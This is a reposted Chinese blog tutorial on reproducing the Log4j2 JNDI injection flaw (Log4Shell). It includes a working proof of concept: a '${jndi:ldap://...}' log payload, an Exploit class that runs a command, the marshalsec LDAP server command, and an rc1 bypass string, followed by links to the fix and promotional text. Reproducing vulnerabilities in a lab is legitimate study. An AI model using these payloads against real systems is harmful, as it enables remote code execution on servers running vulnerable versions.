手把手复现了 Log4j2 漏洞,太可怕了。。
阅读本文大概需要 2.8 分钟。
来自:blog.csdn.net/qq_40989258/article/details/121862363
0x00 简介
0x01 漏洞概述
0x02 影响范围
Apache Log4j 2.x <= 2.15.0-rc1
0x03 环境搭建
org.apache.logging.log4j
log4j-core
2.14.1
0x04 漏洞利用
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
public static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
logger.error("${jndi:ldap://localhost:8888/Exploit}");
}
}
class Exploit {
static {
System.err.println("Pwned");
try {
String cmds = "calc";
Runtime.getRuntime().exec(cmds);
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
javac exp.java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888
"?Type=A Type&Name=1100110&Char=!"
可绕过rc1,RC2版本对此异常进行了捕获。Spring Boot 学习笔记分享给你。https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2
0x05 修复方式
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
推荐阅读:
内容包含Java基础、JavaWeb、MySQL性能优化、JVM、锁、百万并发、消息队列、高性能缓存、反射、Spring全家桶原理、微服务、Zookeeper、数据结构、限流熔断降级......等技术栈!
⬇戳阅读原文领取! 朕已阅